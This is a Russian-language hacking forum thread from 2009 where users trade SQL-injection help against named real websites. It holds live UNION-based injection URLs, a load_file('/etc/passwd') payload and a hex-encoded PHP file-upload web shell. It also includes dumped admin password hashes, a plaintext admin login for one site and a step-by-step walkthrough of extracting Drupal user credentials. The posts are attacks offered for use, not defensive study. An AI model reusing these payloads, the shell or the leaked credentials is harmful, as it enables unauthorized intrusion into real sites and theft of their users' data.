RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-30 19:59:33.610000
|
|
|
pod_edge
Сообщений: 26
Оценки: 0
Присоединился: 2009-06-25 16:47:08.883333
|
quote:
Возьми любой переводчик и посмотри, как переводится эта ошибка.
Я понимаю как переводится.
Просто там в конце URL, нельзя из него что-нибудь выжать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-01 10:07:47.466666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
index.php?do=getcode&code=1+;+updаtе+topsite_account+SET+title=1+WHERE+id=1
SELECT id,title FROM topsite_account WHERE id = 1 ; updаtе topsite_account SET title=1 WHERE id=1
quote:
Mysql Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'updаtе topsite_account SET title=1 WHERE id=1' at line 1
ПОЧЕМУ НЕ РЕДАКТИРУЕТСЯ?
ну где сдесь ошибка?
обычный запрос на вывод работает!
index.php?do=getcode&code=1+UNION+SELECT+title,2+from+topsite_account+where+id=1
и еще как залить файл что бы по катологу побегать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-02 07:45:50.883333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
ну что никто подсказть неможет?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-02 22:29:24.443333
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
ну что никто подсказть неможет?
Уважаемый, что за тон…..
Или вы и в прямь решили, что кто то обязан вам помагать……..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 00:00:06.640000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
GoldCode
1. Сдесь пишется через З.
2. Что за бд?
3. "и еще как залить файл что бы по катологу побегать?"
Чего? оО
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 09:04:48.063333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
1. Сдесь пишется через З.
где сдесь? и что через 3?
quote:
2. Что за бд?
5
quote:
3. "и еще как залить файл что бы по катологу побегать?"
Чего? оО
LOAD_FILE и OUTFILE, только как запрос сформировать!?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 12:41:40.790000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
Здесь есть ответ на одну из твоих проблем
–>
<<здесь>>
<–
А здесь на другую
–>
<<здесь>>
<–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 15:52:46.360000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Парни помогите http://www.rdrpoly.ru/subcategory.php?SCID=-4+union+select+1,2,3,4,5,6,7,8/* нарыл сайт что можно сделать :)
Предупреждение - все ссылки не в тегах ссылка будут удаляться. Без обид
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 16:13:09.670000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
что-что, шелл можно залить:
http://www.rdrpoly.ru/subcategory.php?SCID=-4+union+select+1,2,3,4,5,6,7,load_file('/etc/passwd')/*
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 16:29:56.650000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Pashkela спасибо :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 16:43:02.660000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Pashkela, а можно по подробнее про заливку шелла ;).
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 16:58:05.793333
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Pashkela, спасибо огромное,молоток!!!;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-03 20:19:46.920000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
b]Pashkela,чем ты кодировал 0x3c666f726d20656e63747970653d6d756c7469706172742f666f726d2d6461746120206d6574686f643d706f73743e3c696e707574206e616d653d7573657266696c6520747970653d66696c653e3c696e70757420747970653d7375626d6974206e616d653d676f3e3c2f666f726d3e3c3f696628697373657428245f504f53545b676f5d29297b69662869735f75706c6f616465645f66696c6528245f46494c45535b7573657266696c655d5b746d705f6e616d655d29297b40636f707928245f46494c45535b7573657266696c655d5b746d705f6e616d655d2c245f46494c45535b7573657266696c655d5b6e616d655d293b7d7d3f3e
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-04 00:16:18.440000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
tohack
Видишь как начинается код<< 0x>> зачит что….. правельно это Hex
Зашифровать (разшифровать) моно
здесь
–>
http://ostermiller.org/calc/encode.html
<–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-04 00:20:39.056666
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
farex,спасибо [sm=bf.gif]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 14:17:11.206666
|
|
|
Sh4rp3r
Сообщений: 17
Оценки: 0
Присоединился: 2006-11-21 12:41:25.060000
|
Господа, нашел сайт, возможно с потенциальной sql-инъекцией.
https://www.жертва.com/shop.php?ID=12'
quote:
Invalid query: You have an error in your SQL syntax near ''' at line 1
Я попробовал сделать так:
https://www.жертва.com/shop.php?ID=31337%20union%20select%20password%20from%20users
quote:
Invalid query: You have an error in your SQL syntax near 'union select password from users' at line 1
Что вообще можно попробовать в данном случае?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 14:52:46.700000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: Sh4rp3r
Господа, нашел сайт, возможно с потенциальной sql-инъекцией.
[link=https://www.жертва.com/shop.php?ID=12']https://www.жертва.com/shop.php?ID=12'[/link]
quote:
Invalid query: You have an error in your SQL syntax near ''' at line 1
Я попробовал сделать так:
[link=https://www.жертва.com/shop.php?ID=31337%20union%20select%20password%20from%20users]https://www.жертва.com/shop.php?ID=31337%20union%20select%20password%20from%20users[/link]
quote:
Invalid query: You have an error in your SQL syntax near 'union select password from users' at line 1
Что вообще можно попробовать в данном случае?
для начала кинь ссылку а там посмотрим…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 15:22:40.123333
|
|
|
Sh4rp3r
Сообщений: 17
Оценки: 0
Присоединился: 2006-11-21 12:41:25.060000
|
quote:
ORIGINAL: sepo
quote:
ORIGINAL: Sh4rp3r
Господа, нашел сайт, возможно с потенциальной sql-инъекцией.
[link=https://www.%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%B0.com/shop.php?ID=12%27]https://www.жертва.com/shop.php?ID=12'[/link]
quote:
Invalid query: You have an error in your SQL syntax near ''' at line 1
Я попробовал сделать так:
[link=https://www.жертва.com/shop.php?ID=31337%20union%20select%20password%20from%20users]https://www.жертва.com/shop.php?ID=31337%20union%20select%20password%20from%20users[/link]
quote:
Invalid query: You have an error in your SQL syntax near 'union select password from users' at line 1
Что вообще можно попробовать в данном случае?
для начала кинь ссылку а там посмотрим…
https://www.balticmill.com/shop/CatDetails.php?firstLevelCatID=1'
Все рабочие ссылки в тегах
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 16:11:02.670000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Нет там union, третья ветка:
https://www.balticmill.com/shop/CatDetails.php?firstLevelCatID=1+or+1=1+and+substring(version(),1,1)=3
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 16:23:31.896666
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
https://www.balticmill.com/shop/CatDetails.php?firstLevelCatID=1+order+by+1/*
Так проще будет, я думаю.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 16:33:37.530000
|
|
|
Sh4rp3r
Сообщений: 17
Оценки: 0
Присоединился: 2006-11-21 12:41:25.060000
|
Pashkela, спасибо. Есть ли решение на подобный случай?
blonx, если честно, не понял тебя. Но спасибо всё равно ;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 17:11:17.350000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
есть, ломаешь по правилам слепых скулей, в общем брут чистой воды
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 17:23:18.370000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Я не понял,а почему моё сообщение удалили
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 17:28:34.400000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables помогите найти логин и пароль админа
Потому что рабочие ссылки можно постить только в тегах, в следующий раз опять удалю
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 17:46:39.680000
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
admin:4588b475280c096a7b89274416ad9d63
Ellaway:5cc6d9e0f09e948653108437d6edaa23
Расшифровывай сам )
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 18:20:27.343333
|
|
|
Sh4rp3r
Сообщений: 17
Оценки: 0
Присоединился: 2006-11-21 12:41:25.060000
|
quote:
ORIGINAL: Cep}|{
admin:4588b475280c096a7b89274416ad9d63
Ellaway:5cc6d9e0f09e948653108437d6edaa23
Расшифровывай сам )
Если не сложно, не мог бы описать ход своих действий?
Я попробовал так:
quote:
http://www.ellaways.com.au/news.php?id=-112+union+select+password+from+users_users
quote:
Table 'ellaways_ellaways.users_users' doesn't exist
Почему так? Ведь таблица users_users существует, что следует из ответа на запрос:
quote:
">quote:
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 18:30:16.543333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
чего ты хочешь, вообще? Там админка под .htpasswd
http://www.ellaways.com.au/admin
дохлый номер
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 18:34:33.626666
|
|
|
Sh4rp3r
Сообщений: 17
Оценки: 0
Присоединился: 2006-11-21 12:41:25.060000
|
Конкретно от этого примера я ничего не хочу. А вообще, я хочу разобраться. Каким образом был добыт хэш пароля.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-07 18:36:28.636666
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
Может подойдет друпаловский или тикивиковский. В тики вообще жесткий хеш - $1$xjHSS2U.$4hglUlq6DYLPlYe8tyP6k/ )
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 02:00:44.970000
|
|
|
papst
Сообщений: 315
Оценки: 0
Присоединился: 2008-11-19 22:17:57.653333
|
_http://www.bvz.at/redaktion/bvz-mtb/article.asp?Text=302917&cat=833+and+1=1/*
сдесь возможно чтото сделать??
ато я заморочился уже (((
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 02:11:04.170000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Неа
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 04:37:48.260000
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
quote:
ORIGINAL: Sh4rp3r
Если не сложно, не мог бы описать ход своих действий?
Смотрим таблицы:
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables
их дохрена. Видим schemata'у
Смотрим ее:
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,schema_name,4,5,6,7,8,9,10,11+from+information_schema.schemata
- видим друпал
Логически домысливаем что там может быть таблица users + мы ее видели в начале)
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11+from+ellaways_drupal.users - видим что таблица есть
Подбираем имена полей наугад, мы же знаем как они обычно называются (я не знаком с друпалом поэтому не знаю как они там точно называются):
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,concat_ws%280x3a,name,pass%29,4,5,6,7,8,9,10,11+from+ellaways_drupal.users
Опа, и мы видим пары логин\хэш
Таким же образом можно пройтись по всем остальным базам.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 16:07:54.650000
|
|
|
[eX]
Сообщений: 3
Оценки: 0
Присоединился: 2009-07-10 15:46:05.490000
|
Помогите, пожалуйста, разобраться…
Версия, дб, юзер: 5.0.81-community-log:aawowinf_wow:aawowinf@localhost Дальше попробовал узнать таблицы:
http://www.aawow.info/index.php?id=1+union+select+1,2,group_concat(table_name),4+from+information_schema.tables
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,
VIEWS,categories,img,links,recomend,settings,sites,userlist,users,addons_comments,addons_patch,addons_razdel,addons_screen,adonns,
comments_img,gaids,gaids_comments,gaids_razdel,gb,movie,movie_comments,news,news_comments,opros_name,opros_varianti,patchi,
patchi_comments,questions,questions_comments,settings,user,userlist
Узнал…) Но из user или users/userlist и других вариантов ничего не получается вытащить…(
Пробовал http://www.aawow.info/index.php?id=1+union+select+1,2,concat_ws(0x3a,user,password),4+from+users
И другие варианты вместо users…
Что не так делаю?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 17:02:56.823333
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
[link=http://www.aawow.info/index.php?id=1+union+select+1,2,concat%28name,0x3a,pass%29,4+from+user]http://www.aawow.info/index.php?id=1+union+select+1,2,concat%28name,0x3a,pass%29,4+from+user[/link]
Логин и пароль админа:
http://www.aawow.info/index.php?id=1+union+select+concat%28user,0x3a,pass%29,2,3,4+from+userlist
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 18:19:38.880000
|
|
|
[eX]
Сообщений: 3
Оценки: 0
Присоединился: 2009-07-10 15:46:05.490000
|
Т.е. concat(user,0x3a,pass) нужно подставлять под одним из номеров? Ну как я понимаю, что под каким-то номером будет этот userlist?)
Например, если бы не дало результатов вместо 1, то подставлять дальше по списку? - 2,3,4?
И кстати пароль с логином не подходят почему-то [&:]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 18:45:32.803333
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Как не подходит.
Заходишь вот сюда:
[link=http://www.aawow.info/admin/]http://www.aawow.info/admin/[/link]
И вводишь:
cool-admin:777989
[link=http://www.aawow.info/index.php?id=1+union+select+concat%28user,0x3a,pass%29,2,3,4+from+userlist]http://www.aawow.info/index.php?id=1+union+select+concat%28user,0x3a,pass%29,2,3,4+from+userlist[/link]
Всё должно подойти я только что пробывал =)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-10 18:52:14.110000
|
|
|
[eX]
Сообщений: 3
Оценки: 0
Присоединился: 2009-07-10 15:46:05.490000
|
Да, уже разобрался, спасибо)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-11 19:04:18.090000
|
|
|
Sh4rp3r
Сообщений: 17
Оценки: 0
Присоединился: 2006-11-21 12:41:25.060000
|
quote:
ORIGINAL: Cep}|{
quote:
ORIGINAL: Sh4rp3r
Если не сложно, не мог бы описать ход своих действий?
Смотрим таблицы:
http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables
их дохрена. Видим schemata'у
Смотрим ее:
[link=http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,schema_name,4,5,6,7,8,9,10,11+from+information_schema.schemata]http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,schema_name,4,5,6,7,8,9,10,11+from+information_schema.schemata[/link]
- видим друпал
Логически домысливаем что там может быть таблица users + мы ее видели в начале)
[link=http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11+from+ellaways_drupal.users]http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11+from+ellaways_drupal.users[/link] - видим что таблица есть
Подбираем имена полей наугад, мы же знаем как они обычно называются (я не знаком с друпалом поэтому не знаю как они там точно называются):
[link=http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,concat_ws%280x3a,name,pass%29,4,5,6,7,8,9,10,11+from+ellaways_drupal.users]http://www.ellaways.com.au/news.php?id=-112+union+select+1,2,concat_ws%280x3a,name,pass%29,4,5,6,7,8,9,10,11+from+ellaways_drupal.users[/link]
Опа, и мы видим пары логин\хэш
Таким же образом можно пройтись по всем остальным базам.
Благодарю. Всё понял.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-12 12:07:07.486666
|
|
|
axot111
Сообщений: 13
Оценки: 0
Присоединился: 2009-07-11 22:51:38.426666
|
Расскажите как производится SQL inj в oracle, поиск и проведение… Или дайте ссылки на статьи и мануалы… Спасибо…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-07-12 14:53:56.110000
|
|
|
Arhangell
Сообщений: 5
Оценки: 0
Присоединился: 2009-07-04 16:44:12.026666
|
quote:
ORIGINAL: axot111
Расскажите как производится SQL inj в oracle, поиск и проведение… Или дайте ссылки на статьи и мануалы… Спасибо…
для начала прочитай это http://forum.xakep.ru/m_1507291/tm.htm
|
|
|
|
|
|
